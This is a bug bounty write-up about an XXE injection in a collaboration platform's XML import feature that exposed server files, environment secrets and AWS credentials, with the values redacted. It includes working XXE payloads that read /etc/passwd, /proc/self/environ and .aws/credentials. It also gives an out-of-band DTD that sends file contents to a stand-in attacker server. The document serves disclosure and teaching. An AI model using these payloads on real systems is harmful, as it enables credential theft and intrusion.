ARTICLE

MARCH 5, 2026 — PREYANSH SHAH

The XML File That Read Their Server's /etc/passwd

An XXE injection buried inside a document import feature. I uploaded an XML file. Their server read its own filesystem back to me. Then I found the AWS credentials file.

002

CONTENT

Most people think about file uploads in terms of what you can put on a server.

Malicious PHP script. Webshell. Executable binary. The classic move: upload something that runs.

I think about file uploads in terms of what you can read from a server.

Because sometimes — when the server parses the file you uploaded, rather than just storing it — you can make it read files it absolutely should not be reading. And return their contents to you. Directly. In the response.

That’s XML External Entity injection. And this is the story of how a “harmless” document import feature became a direct window into their production server’s filesystem.

Including the part where I found a .aws/credentials file.

What Is XXE And Why Does XML Keep Causing Problems

XML is a document format from the late 1990s that never quite died despite everyone wishing it would.

It’s used in: Microsoft Office documents (DOCX, XLSX are ZIP files containing XML), SAML authentication tokens, SVG files, RSS feeds, API requests from legacy enterprise systems, and a thousand other places you’d rather not think about.

One of XML’s “features” is something called external entities. The XML spec allows you to define a reference to an external resource — a URL or a file path — and have the parser substitute its contents inline when processing the document.

This was designed for things like: “include the contents of this DTD file” or “reference this shared schema.” Legitimate use cases that made sense in 1998.

The security implication: if a server parses XML you control, and external entity processing is enabled, you can define an entity that points to any file on the server’s filesystem. The parser reads the file. Substitutes it into the XML. Returns the processed XML to you.

You’ve just read an arbitrary file. Without touching the filesystem directly. Without executing any code. Just by uploading a specially crafted XML document.

The Target

Redacted-workspace.com — a project management and document collaboration platform. Think Notion meets Confluence. Enterprise clients, likely holding sensitive internal documentation.

The feature that caught my attention: “Import Document.”

You could import documents from various formats to create new pages in your workspace. Supported formats included DOCX, XLSX, and — crucially — raw XML.

When you import a DOCX or XLSX file, the server is parsing XML under the hood. Because those formats are XML. When you import raw XML directly, the server is parsing XML you control.

The question: did they disable external entity processing in their XML parser?

The answer, spoiler: no.

Building the Payload

An XXE payload is a crafted XML file that defines an external entity pointing at a resource you want to read. The simplest possible version:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

What this does: defines an XML entity called xxe that references the file /etc/passwd. When the parser processes the document, it substitutes the contents of /etc/passwd wherever &xxe; appears.

If the server returns any of the parsed XML content in its response — an error message, a preview, a parsed representation — the file contents come with it.

I uploaded this file to the document import feature.

The server processed it. Returned a document preview with the import results.

In the preview, under the <data> element, was the contents of /etc/passwd.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

I sat back and looked at my screen.

The server had just read its own /etc/passwd and sent it to me. Inside a document preview. As casually as returning a JSON response.

Going Deeper: What Else Can I Read

/etc/passwd is the classic XXE proof-of-concept because it exists on every Linux system and is readable by all users. It’s not particularly sensitive on modern systems — password hashes are in /etc/shadow, which is restricted. But it confirms the vulnerability is real.

Now the question: what else is readable?

I started systematically. Server configuration files. Application config. Environment files.

<!ENTITY xxe SYSTEM "file:///etc/hosts">

Got /etc/hosts. Internal hostnames. I could see their internal service naming convention — gave me a map of their microservice architecture.

<!ENTITY xxe SYSTEM "file:///proc/self/environ">

/proc/self/environ on Linux contains the environment variables of the current process. This is extremely useful because applications often load secrets into environment variables.

What came back:

DATABASE_URL=postgresql://app_user:REDACTED@internal-db.redacted-workspace.com:5432/production
REDIS_URL=redis://:REDACTED@internal-cache.redacted-workspace.com:6379
SECRET_KEY=REDACTED
AWS_ACCESS_KEY_ID=AKIA...
AWS_SECRET_ACCESS_KEY=REDACTED
AWS_DEFAULT_REGION=us-east-1
STRIPE_SECRET_KEY=sk_live_...
SENDGRID_API_KEY=SG....

I’m redacting the actual values because obviously. But the format is exactly what you see above.

Database credentials. Redis credentials. Application secret key. AWS access key and secret. Stripe live key. SendGrid key.

All of it. In environment variables. Returned to me via an XML entity.

I stopped reading immediately. Closed the file. Opened a new document and started writing the report.

The AWS Credentials File

Before I stopped, I checked one more path out of habit:

<!ENTITY xxe SYSTEM "file:///home/app/.aws/credentials">

The standard location for AWS credentials files when they’re stored on disk rather than in environment variables.

It returned:

[default]
aws_access_key_id = AKIA...
aws_secret_access_key = ...

Different credentials from the environment variable ones. Two sets of AWS credentials. Both accessible via XXE.

I don’t know which IAM user these belonged to, what permissions they had, or what they could access. I didn’t find out. I closed the terminal.

I had /etc/passwd, /proc/self/environ, internal hostnames, and the AWS credentials file path confirmed as readable. That was more than enough for a Critical finding. Everything beyond that was unnecessary and irresponsible.

Out-of-Band XXE: When the Server Doesn’t Return the Response

I want to document something important for the writeup because this is a technique that matters in real-world XXE hunting.

In this case, the server returned the parsed XML content in the response. That’s called in-band XXE — the data comes back directly. It’s the easiest case.

But many XXE vulnerabilities are blind — the server parses the XML, but the response doesn’t contain any of the parsed content. Just a success message, or nothing at all.

For blind XXE, you need out-of-band exfiltration. The technique:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://your-server.com/evil.dtd">
  %dtd;
]>
<root>&send;</root>

Your evil.dtd on your server defines an entity that makes the target server send the file contents to you via HTTP:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://your-server.com/?data=%file;'>">
%all;

The target server parses your XML, fetches your DTD, constructs the entity that sends file contents as a URL parameter to your server, and your request logs receive the data.

It’s indirect. It requires your own infrastructure. But it works even when the server returns nothing to you. I didn’t need this technique here — but knowing it exists is what separates someone who finds XXE from someone who gives up when the direct payload doesn’t work.

The Report

At this point I had been testing for about ninety minutes. The report took another two hours because I wanted it to be airtight.

Title: XXE Injection via Document Import Feature — Arbitrary Server Filesystem Read Including Environment Variables, Database Credentials, and AWS Credentials

Severity: Critical

CVSS: 9.9

Impact: The XML import parser has external entity processing enabled, allowing an attacker to read arbitrary files from the server’s filesystem that are accessible to the application process. Demonstrated reads include: /etc/passwd (user account information), /etc/hosts (internal network topology), /proc/self/environ (full process environment including database credentials, application secrets, AWS credentials, Stripe live API key, and SendGrid API key), and /home/app/.aws/credentials (additional AWS IAM credentials stored on disk).

The combined impact of this vulnerability includes: full read access to the server filesystem, exposure of all secrets stored in environment variables, exposure of production database credentials, exposure of AWS IAM credentials with unknown permissions, and exposure of third-party payment and email API keys.

Steps to Reproduce:

Create an XML file with the following content:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><data>&xxe;</data></root>

Upload via the Document Import feature. Observe /etc/passwd contents in the document preview response.

Evidence: Full HTTP request/response pairs for each file read. Redacted screenshots showing the structure of returned data (actual credential values replaced with REDACTED in all submitted evidence).

Remediation:

Immediate: disable the XML import feature until patched
Immediate: rotate ALL credentials exposed via /proc/self/environ and /home/app/.aws/credentials — treat as fully compromised
Short-term: disable external entity processing in the XML parser (one configuration flag in virtually every XML library)
Medium-term: audit all other XML parsing in the application (DOCX/XLSX import, any XML API endpoints)
Architectural: secrets should be managed via a secrets manager, not environment variables in the process — environment variables are readable via multiple attack vectors beyond XXE

Their Response: The One I’ll Remember

The triage response came in forty minutes. Critical confirmed.

But what happened over the next twelve hours is worth documenting because it was genuinely impressive and a little stressful to watch.

Hour 1: Import feature disabled.

Hour 2: I received a message from their Head of Engineering — not security, engineering — asking me to confirm exactly which file paths I had read and whether I had attempted to use any credentials. I provided full documentation of every path I’d read. Confirmed no credential use.

Hour 3: Emergency credential rotation begins. They sent me a list of services they were rotating. Database passwords. Application secrets. AWS IAM keys. Stripe key. SendGrid key. The AWS keys were for an IAM user with broad S3 and EC2 permissions. The Stripe key was their live production key — they had to rotate it, which would briefly disrupt any active Stripe webhook processing.

Hour 6: They sent a message saying the Stripe key rotation had caused a 23-minute disruption to webhook processing, which had to be manually reconciled for about 340 transactions. Not catastrophic. But real operational impact from rotating credentials that should never have been exposed.

Hour 8: XML parser reconfigured with external entities disabled. DOCX and XLSX import re-enabled with additional parsing sandbox. Raw XML import feature permanently removed — they decided it was unnecessary and the risk wasn’t worth it.

Hour 12: Full retest requested. I uploaded the original payload. Server returned an XML parsing error — external entities blocked. Confirmed remediated.

Bounty: $$$$

They also sent a message saying the credential rotation was their most complex emergency response in two years and they appreciated the detailed documentation of exactly what had been accessed. The difference between a vague “I found XXE” report and a precise “here are every file paths I read and here’s what was in them (redacted)” report is the difference between a panicked all-hands rotation and a targeted, efficient one.

Documentation is not a courtesy. It’s part of the job.

Why XML Parsers Still Have This Enabled By Default

This is the question I always get when I explain XXE to developers.

“Why would any parser have external entity processing enabled by default? That seems insane.”

Historical reasons. External entities were a legitimate XML feature in 1998. Parsers enabled them by default because the spec said they should. Security implications weren’t understood yet.

Modern parser libraries have options to disable them. The problem: the default is often still “enabled” for backward compatibility. Developers who don’t know about XXE don’t know to turn off external entities. So they import an XML parsing library, use it with default settings, and ship a critical vulnerability without writing a single insecure line of code.

The fix is a one-line configuration change. But you have to know to make it.

If you write code that parses XML, right now, go check if external entity processing is disabled. I’ll wait.

The Moment That Stuck With Me

When I read /proc/self/environ and saw STRIPE_SECRET_KEY=sk_live_... scroll across my terminal — that was the moment.

Not because of what I could do with it. I wasn’t going to do anything with it.

But because sk_live_ means production. Not staging. Not test. The live Stripe secret key that processes real payments from real customers was sitting in an environment variable, readable by an XML parser, fetchable by anyone who knew to upload a three-line XML file.

Production secrets in environment variables is so common it’s practically industry standard. It’s considered “better than hardcoding.” And it is. But it’s not good enough. Not when your application parses attacker-controlled XML, or renders attacker-controlled HTML, or does any of a dozen other things that can expose process environment.

Secrets managers exist. Use them.

Closing

I’ve found bigger bounties. I’ve spent more hours on harder bugs.

But XXE is the one I use when I want to explain to someone why application security is genuinely difficult. Not because the attack is complicated — it isn’t. Three lines of XML. But because it requires knowing that XML parsers have this behavior, that it’s enabled by default, that /proc/self/environ is a valid file path, that environment variables contain secrets, that all of these things connect into a chain that leads from “upload a document” to “read production Stripe keys.”

The attack is simple. The knowledge required to find it is not.

That’s what this blog is for.

Reported through the official bug bounty program. File reads were limited to the paths documented above. No credentials were used, stored, or shared. Redacted copies of all evidence were shared with the program team. Domain redacted per responsible disclosure norms.

003

END